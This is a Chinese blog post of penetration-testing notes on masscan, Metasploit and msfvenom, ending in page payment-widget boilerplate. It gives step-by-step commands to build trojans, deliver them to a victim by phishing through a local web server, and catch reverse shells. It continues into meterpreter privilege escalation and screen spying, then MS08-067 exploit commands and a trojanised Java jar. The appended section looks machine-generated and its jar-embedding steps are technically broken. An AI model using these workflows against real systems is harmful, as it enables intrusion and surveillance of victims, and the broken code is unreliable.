内网渗透笔记——msf

Masscan

号称五分钟扫遍互联网


性能优越,极限速度 1000w/s,参数 跟 nmap 差不多

-p 80,8000-8100 10.0.0.0/24
--max-rate=100000    //发包的极限速度


masscan 0.0.0.0/0 -p 0-65535     //扫描整个互联网的所有端口

不要轻易尝试.......

Metasploit(msf)

一旦出现漏洞,出现利用漏洞的方法,则会马上收录——傻瓜式攻击

早期想要利用漏洞——需知道漏洞的poc和exp

poc:漏洞验证脚本(只会告诉你存在这个漏洞)

​ log4j:calc

exp:漏洞利用脚本(详细操作方法)

msf分为两大块


msfconsole(控制台)

msfvenom(木马生成平台,一键生成木马)

metasploit v6.1.4-dev                           ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion  

exploite:漏洞利用,配合payload

payload:成功exp后,攻击过程中执行的指令或代码,反弹shell,也可以是直接在目标系统中执行的指令

- singles:所有代码都在一个文件中(大木马),会受到内存空间的限制
- stagers:传输payload所建立的连接,安全的把我们的payload传输到目标运行(stages)
- stages:stagers建立连接后,在传输的代码(payload)

auxiliary:辅助模块,用于信息收集,没有payload的exp
encoders:编码模块,对payload进行加密,躲避杀毒的查杀

post:取得shell,进一步运行的攻击指令(后渗透)

nops:空指令,起到混淆的作用

evasion:免杀,效果非常好,但具有时限性,百分百免杀

msfdb(msf数据库,用于信息收集的存储)

msfdb init          初始化数据库

service postgresql start      启动数据库
msfdb run   自动启用连接数据库

db_status        查询是否连接数据库

hosts、services      查询扫描到的数据

db_nmap == nmap(但是nmap不会存入数据库)

connect 192.168.111.131 4444  类似nc的小工具(这里是正向连接)

注意:初始化数据库,启动数据库之后,要重启控制台(exit——msfconsole)

use exploit/multi/handler      监听模块

-info 

-show options     都是查看命令

常见payload连接方式
payload:
    bind        正向
    reverse        反向
    http        80
    https        443

payload设置方式:

set payload 操作系统/[架构/]终端/连接方式

 meterpreter      升级版shell

 LHOST ——本地ip        LPORT——端口

完成

run开始监听(或者exploit)

msfvenom

木马生成平台

-p            设置payload
-a            架构 x64 x86
      --platform    设置平台 windows/linux
-e            编码
-i            迭代
-f            文件格式
        -f raw -o 1.apk
        R -o 1.apk
-o            输出文件
    >
-l | --list            信息详细

注意!生成的payload 要和console设置的payload大致相同

比如你监听的是windows的木马,你生成的是linux的木马,很明显不合理


lhost=本机ip
rhost=目标ip

以上面设置的payload为例子,生成一个木马

好了,现在至关重要的问题来了,该怎么把木马放到受害者的靶机上呢?

最常用的方法——钓鱼


在当前文件夹快速开启http服务——搭建本地的一个网页
python2.7 -m SimpleHTTPServer 8080
python3.9 -m http.server 8080

靶机进入临时网站

注意一点,win7靶机要事先关闭防火墙,不然kali无法ping通win7

这里有奇怪的一点,输http://192.168.111.130:8080/可以访问,但是输192.168.111.130:8080无法访问,有点玄学。

 kali立刻就会显示访问网页的ip地址

kali开始监听

靶机下载木马并运行

 

kali获得反弹shell,成功!

shell

shell ctrl_z          shell放入后台

sessions             查看后台的连接

 sessions -u ID       shell 会话提升→meterpreter

meterpreter

meterpreter  bg          返回上层

信息收集
getuid
getsid

sysinfo
getsystem    一键提权,失败率较高,满试试

 run vnc  直接直播

以网页的方式查看    >    直播
screenshare

常用的后渗透信息收集

 

### 关于 Metasploit 框架在内网渗透中的应用 #### 什么是 Metasploit? Metasploit 是一种功能强大的开源渗透测试框架,广泛应用于网络安全评估和漏洞研究领域。该框架提供了丰富的模块化设计,支持多种类型的攻击向量以及后渗透阶段的操作工具[^1]。 #### 内网渗透的主要过程 内网渗透通常遵循标准化的渗透测试流程,具体分为以下几个部分: - **前期交互 (Pre-engagement Interactions)** 此阶段涉及与客户沟通以明确目标范围、时间安排以及其他约束条件等内容[^2]。 - **情报收集 (Intelligence Gathering)** 利用公开资源或技术手段搜集有关目标网络的信息,例如 IP 地址、开放端口和服务版本等数据。 - **威胁建模 (Thread Modelling)** 对所获得的情报进行分析处理,并识别潜在的安全风险点。 - **漏洞分析 (Vulnerability Analysis)** 运用扫描器或其他自动化工具检测系统中存在的弱点,同时验证其真实性。 - **渗透攻击 (Exploitation)** 配置合适的exploit模块针对发现的目标服务发起实际攻击尝试获取控制权^。 - **后渗透攻击 (Post Exploitation)** 成功入侵之后进一步探索内部环境寻找敏感资料或者横向移动至其他主机上继续扩展访问权限^。 - **报告撰写 (Reporting)** 将整个过程中遇到的问题汇总整理成文档形式提交给委托方作为改进依据^。 #### 使用案例:通过 MS08-067 漏洞实现远程代码执行 假设存在一台运行 Windows Server 2003 的服务器未修补 CVE-2008-4250(即著名的 MS08-067),可以按照如下方式利用 Metasploit 来完成对该机器的接管工作: ```bash use exploit/windows/smb/ms08_067_netapi set RHOSTS <target_ip> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <local_ip> set LPORT <listening_port> run ``` 上述命令序列依次完成了指定目标地址、选择有效载荷类型及其参数设置最后启动攻击动作的任务描述[^3]^。 另外,在某些特殊场景下如果目标环境中部署有 Java 应用程序,则还可以考虑采用基于 JVM 层面存在的缺陷来进行突破尝试。比如下面这个例子展示了如何创建一个带有隐藏功能的 JAR 文件用于分发传播恶意软件实例: ```java import java.io.*; public class Evil { public static void main(String[] args){ try{ Runtime.getRuntime().exec("cmd /c start calc.exe"); }catch(Exception e){} } } // Compile and package into a jar file. javac Evil.java && jar cvfe evil.jar Evil.class . ``` 接着再配合 `msfvenom` 工具生成自定义 payload 并嵌入到刚才准备好的载体当中去形成最终成品供后续投放使用[^4]^。 ```bash msfvenom -p generic/shell_reverse_tcp LHOST=<your_IP> LPORT=<port_number> -f raw > shellcode.bin cat shellcode.bin >> evil.jar zip -A evil.jar ``` 以上便是关于如何运用 Metasploit 开展内网渗透活动的一些基础知识和技术要点概述。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值